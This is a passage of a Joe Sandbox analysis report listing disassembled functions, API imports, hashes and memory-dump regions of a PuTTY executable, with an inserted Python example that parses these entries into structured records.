                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$0 <= p && p < width$opos == term->cols
                      • API String ID: 0-2817353598
                      • Opcode ID: 48c84171e4e6dbe3ca64c24b21b4607ca9543aec5e6d4045095969cd4c2680a5
                      • Instruction ID: 997823f21725c62d97ba86993b1de9fc4ecd2cda1a9a08555c693bc68ce82962
                      • Opcode Fuzzy Hash: 48c84171e4e6dbe3ca64c24b21b4607ca9543aec5e6d4045095969cd4c2680a5
                      • Instruction Fuzzy Hash: 3A52B073A14B9986EB948F25D5447EE3B68FB88B84F168122EF4E473A5DF38D940C344
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$len <= pool->nw$scratch.nw >= mp_mul_scratchspace_unary(inlen)
                      • API String ID: 1949149715-1079915730
                      • Opcode ID: 175617af099b570f1206e9f1cb82f0c403bc199e54224aa9d1c812f6e4cfecdf
                      • Instruction ID: 35d2abad1a1d940bde6a0f212abd138030f9789958c52038793822aab3281eae
                      • Opcode Fuzzy Hash: 175617af099b570f1206e9f1cb82f0c403bc199e54224aa9d1c812f6e4cfecdf
                      • Instruction Fuzzy Hash: 6722B133B29A86A4EA60CF21E5543AF7761FB98B84F644032CA8D87B58EF7CD545D304
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: InfoLocale
                      • String ID: GetLocaleInfoEx
                      • API String ID: 2299586839-2904428671
                      • Opcode ID: 877343d59bc69b94a8249b42954be88c557d486399bdd3dc21f370ad172789df
                      • Instruction ID: b0299f6e322fd39dd4b7632ec0fc94c763d5b74743adee6f31a2c09db7f0f1ff
                      • Opcode Fuzzy Hash: 877343d59bc69b94a8249b42954be88c557d486399bdd3dc21f370ad172789df
                      • Instruction Fuzzy Hash: 1E012B22B1874191EB008B66F4001ABBB61FF94FC0F644035DE0D93B65CE3CDD459748
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirstWindow
                      • String ID:
                      • API String ID: 2475344593-0
                      • Opcode ID: f0e79997787017242be0678a1299ff4153720c64c21be0883609586eed0df27f
                      • Instruction ID: 578e13ba5002d1a38bc8ae2c17b32a513708b8953d054b7298ded6133616c19c
                      • Opcode Fuzzy Hash: f0e79997787017242be0678a1299ff4153720c64c21be0883609586eed0df27f
                      • Instruction Fuzzy Hash: 9601D422F2D281A1FD206B35A9063BB1B505F997B0FA00231DD2D877D5ED1CDCC6AB08
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CaretInfoLocaleProcWindow
                      • String ID:
                      • API String ID: 3511955094-0
                      • Opcode ID: 0d6e8085940ef99706bb6f3e1a4ef4ac9e24338f3159f2bfa11a7cc6f6f21ebf
                      • Instruction ID: 0525e7e4616bafe2ec99604b5dfbae02f43c9a381306b0932714a989640e943f
                      • Opcode Fuzzy Hash: 0d6e8085940ef99706bb6f3e1a4ef4ac9e24338f3159f2bfa11a7cc6f6f21ebf
                      • Instruction Fuzzy Hash: A5F0E927B1818645F9019B32B8053F719406B45BE5F640076CE0DC77D6CC3CDA86BB14
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$len <= pool->nw
                      • API String ID: 1949149715-1244525610
                      • Opcode ID: f0f2536dc577322ef78fa98e8fdf80bd561ec85345326284fd71e3de6c089bb4
                      • Instruction ID: 7050aea035321cf48d970d2aa3b9d2547454cf182698d8102cdd279aa675372d
                      • Opcode Fuzzy Hash: f0f2536dc577322ef78fa98e8fdf80bd561ec85345326284fd71e3de6c089bb4
                      • Instruction Fuzzy Hash: A071BDB7B29BA991EA50CB21E94426F6764FB48BC4F654036DE8D83754EE3CD881D304
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$bits < 0x10000
                      • API String ID: 0-3675183975
                      • Opcode ID: 28a1504607651e3aa4f6fb2db7b465a402ed893108aaac175b55d2498a7ba946
                      • Instruction ID: 451796537b343553154c5b2e83e697473755cafb84efdeb34bd2992c344880f2
                      • Opcode Fuzzy Hash: 28a1504607651e3aa4f6fb2db7b465a402ed893108aaac175b55d2498a7ba946
                      • Instruction Fuzzy Hash: 01415BA6F64A1556EE51C9768E542A92643EB847F0F688331CE3E833D8DE2CDA42D304
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CurrentFeaturePresentProcessProcessor
                      • String ID:
                      • API String ID: 1010374628-0
                      • Opcode ID: 70f05b61e9069f215347a8f1a556d803af62b8d15b7b0aff6d396f4fe1be9d85
                      • Instruction ID: 04f4aae55ece3d439ce7638b1e92804af95a5b47e9bcd5527536ea413e942649
                      • Opcode Fuzzy Hash: 70f05b61e9069f215347a8f1a556d803af62b8d15b7b0aff6d396f4fe1be9d85
                      • Instruction Fuzzy Hash: D202B323A3D66261FE259B32984227B1F84AF01B90F744536DD6DC67D2DE3DEC01A70A
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: BlinkCaretTime
                      • String ID:
                      • API String ID: 1096504186-0
                      • Opcode ID: d3b2025046e6c3242374deb158bf3089506e19e4ab169dd7edca1107dee63013
                      • Instruction ID: fd99b46b03d4603cbb131a4c81bc38fa6bd4b1ee603bc2969d1bcb5fdd42d9d8
                      • Opcode Fuzzy Hash: d3b2025046e6c3242374deb158bf3089506e19e4ab169dd7edca1107dee63013
                      • Instruction Fuzzy Hash: CDF1C323E182C286F7659771A0813FB6E91DB85784F249036CF9E87787DE7CE8858319
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 3215553584-0
                      • Opcode ID: f05dfe4f8452654d334cc3241bb3ea17cad71d45a3c268dd9d68e07dcf381698
                      • Instruction ID: 41f0ebfd1af04d38cf8145e9905b2c6771dfb1d6118b630c0ba38a30ded459d2
                      • Opcode Fuzzy Hash: f05dfe4f8452654d334cc3241bb3ea17cad71d45a3c268dd9d68e07dcf381698
                      • Instruction Fuzzy Hash: 01D1C46392DB4692EF658F34D44027E3B95EB00BA4F64063ADA6D873D4CF38EC51A358
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04d804fca383ebdd87389251a5403f1d7e686250a67475f3d8e14b7a1134c6f1
                      • Instruction ID: 1a09e0f2a8aa8a43e7cddf6769adaf05a326fa093a5ca3772d743fbe412d783a
                      • Opcode Fuzzy Hash: 04d804fca383ebdd87389251a5403f1d7e686250a67475f3d8e14b7a1134c6f1
                      • Instruction Fuzzy Hash: 94C1DF33A1A2E189F741CB65C44CBEB3B94EB51344FA7A035CA68C7382FFB958858754
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _get_daylight_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 474895018-0
                      • Opcode ID: 3dc24be4488f4c8b10247529cee2e8d24edc721d6d4ed829458648f97c931c59
                      • Instruction ID: 5dbee22ec8afd81900458bf0694da84082f331413b2ff113e08811b2b21a745a
                      • Opcode Fuzzy Hash: 3dc24be4488f4c8b10247529cee2e8d24edc721d6d4ed829458648f97c931c59
                      • Instruction Fuzzy Hash: 7961C523F2C55296FB648AB8844577E6E819F40768F350235FA2EC76C6DE7CEC41A708
                      APIs
                        • Part of subcall function 00007FF6786A3098: GetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30A7
                        • Part of subcall function 00007FF6786A3098: FlsGetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30BC
                        • Part of subcall function 00007FF6786A3098: SetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A3147
                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6786A9817,00000000,00000092,?,?,00000000,?,?,00007FF6786988F9), ref: 00007FF6786A9AB2
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystemValue
                      • String ID:
                      • API String ID: 3029459697-0
                      • Opcode ID: 88e0867d24c3eab24e0c880a4b38ef51eafc333871d5a020cd09adc8302cdfcc
                      • Instruction ID: e3b2e211bf7a9b58fc9fb8a7d2568448ada2242f7e1f1b7f9eea53f242561005
                      • Opcode Fuzzy Hash: 88e0867d24c3eab24e0c880a4b38ef51eafc333871d5a020cd09adc8302cdfcc
                      • Instruction Fuzzy Hash: DF11E763A286559AEB148F36D4402AA7FA0FB90BA0F748136C769833C0EE38DDD1D741
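Added example (not part of the Joe Sandbox report and not code from the PuTTY build whose memory is dumped here): a parser for the function entries listed above. It turns each "APIs / Memory Dump Source / Similarity" block into a record, splits the .sdmp file names into their fields, keeps the "Part of subcall function" calls separate from the function's own API calls, and drops the "Download File" link text that the page renders onto the Associated lines. The sample input is two entries copied from the listing and trimmed. Reading field 5 of a dump name as a PAGE_* protection and field 7 as a MEM_* region type is an assumption of this example, not something the report states; the process index 12, stage 2 and module base 0x7ff6785d0000 do line up with the snapshot name hcaresult_12_2_7ff6785d0000_putty.jbxd.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample in the report's own layout: two entries copied from the listing above
# and trimmed (one function with resolved API calls, one with only a string reference).
SAMPLE = """\
APIs
  • Part of subcall function 00007FF6786A3098: GetLastError.KERNEL32(?,?,?,00007FF678692CFB), ref: 00007FF6786A30A7
  • Part of subcall function 00007FF6786A3098: FlsGetValue.KERNEL32(?,?,?,00007FF678692CFB), ref: 00007FF6786A30BC
• EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6786A9817,00000000,00000092), ref: 00007FF6786A9AB2
Memory Dump Source
• Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
• Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
• Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystemValue
• String ID:
• API String ID: 3029459697-0
• Instruction Fuzzy Hash: DF11E763A286559AEB148F36D4402AA7FA0FB90BA0F748136C769833C0EE38DDD1D741
Memory Dump Source
• Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
Similarity
• API ID:
• String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$bits < 0x10000
• API String ID: 0-3675183975
• Instruction Fuzzy Hash: 01415BA6F64A1556EE51C9768E542A92643EB847F0F688331CE3E833D8DE2CDA42D304
"""

API_RE = re.compile(r"•\s+(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
                    r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]+)")
SRC_RE = re.compile(r"•\s+Source File: (?P<dump>\S+?\.sdmp), Offset: (?P<base>[0-9A-F]+), based on PE: (?P<pe>\w+)")
ASSOC_RE = re.compile(r"•\s+Associated: (?P<dump>\S+?\.sdmp)")  # non-greedy: drops the 'Download File' link text
KV_RE = re.compile(r"•\s+(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")

# winnt.h constants. That field 5 of a dump name is a PAGE_* protection and field 7 a MEM_*
# region type is this example's assumption; the values seen here (0x20/0x02/0x04, 0x1000000)
# are consistent with the code, .rdata and .data sections of a loaded PE image.
PAGE = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEMTYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}

def decode_dump_name(name: str) -> dict:
    """Split '<proc>.<stage>.<n>.<region>.<prot>.<x>.<type>.<y>.sdmp' into fields (assumed layout, see above)."""
    f = name[: -len(".sdmp")].split(".")
    prot, mtype = int(f[4], 16), int(f[6], 16)
    return {"dump": name, "process_index": int(f[0], 16), "stage": int(f[1], 16),
            "region": int(f[3], 16), "protect": PAGE.get(prot, hex(prot)), "type": MEMTYPE.get(mtype, hex(mtype))}

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)       # the function's own imports: (module, function, call site)
    subcalls: dict = field(default_factory=dict)   # helper address -> imports reached through that helper
    source: dict | None = None                     # dump region holding the function, plus module base / PE flag
    associated: list = field(default_factory=list) # the other regions of the same module
    fields: dict = field(default_factory=dict)     # Snapshot File, API ID, String ID, hashes

def parse_entries(text: str) -> list[FunctionEntry]:
    """One FunctionEntry per block; 'Instruction Fuzzy Hash' is the last line of every block."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (line == "Memory Dump Source" and cur is None):
            cur = FunctionEntry()
        if cur is None or not line.startswith("•"):
            continue
        if m := API_RE.match(line):
            call = (m["module"], m["func"], int(m["ref"], 16))
            if m["caller"]:
                cur.subcalls.setdefault(int(m["caller"], 16), []).append(call)
            else:
                cur.apis.append(call)
        elif m := SRC_RE.match(line):
            cur.source = {**decode_dump_name(m["dump"]), "base": int(m["base"], 16), "pe": m["pe"] == "true"}
        elif m := ASSOC_RE.match(line):
            cur.associated.append(decode_dump_name(m["dump"]))
        elif m := KV_RE.match(line):
            cur.fields[m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = None
    return entries

def imported_apis(entries: list[FunctionEntry]) -> list[tuple[str, str]]:
    """Distinct (module, function) pairs across all entries, including those reached only via helpers."""
    seen = set()
    for e in entries:
        seen.update((m, f) for m, f, _ in e.apis)
        for calls in e.subcalls.values():
            seen.update((m, f) for m, f, _ in calls)
    return sorted(seen)
```

`imported_apis(parse_entries(SAMPLE))` lists the KERNEL32 imports the first function reaches, including GetLastError and FlsGetValue, which are only visible through the CRT helper at 0x7FF6786A3098. The per-region decode gives an executable region at base+0x1000 with read-only and read-write regions above it, the layout expected of a normally loaded PE image, which is a cheap cross-check on the "based on PE: true" flag before the hashes are compared against other samples.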
                      APIs
                        • Part of subcall function 00007FF6786A3098: GetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30A7
                        • Part of subcall function 00007FF6786A3098: FlsGetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30BC
                        • Part of subcall function 00007FF6786A3098: SetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A3147
                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6786A97D3,00000000,00000092,?,?,00000000,?,?,00007FF6786988F9), ref: 00007FF6786A9DAE
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystemValue
                      • String ID:
                      • API String ID: 3029459697-0
                      • Opcode ID: abb5f3cec4ff362770d1342f42244cd9a48485c11d3d4892fe7aa86ca48b9eee
                      • Instruction ID: 092ac9f279b540d813e344426edbfab0975c097ba22c6a8b6186ba06800a1dfc
                      • Opcode Fuzzy Hash: abb5f3cec4ff362770d1342f42244cd9a48485c11d3d4892fe7aa86ca48b9eee
                      • Instruction Fuzzy Hash: 4E012D73F1855156EB106F35E8407BA7A91EB407A0F718231D279876CAEF3C9CC19705
                      APIs
                      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6786A22B7,?,?,?,?,?,?,?,?,00000000,00007FF6786A943C), ref: 00007FF6786A2F2B
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                       • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                       • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
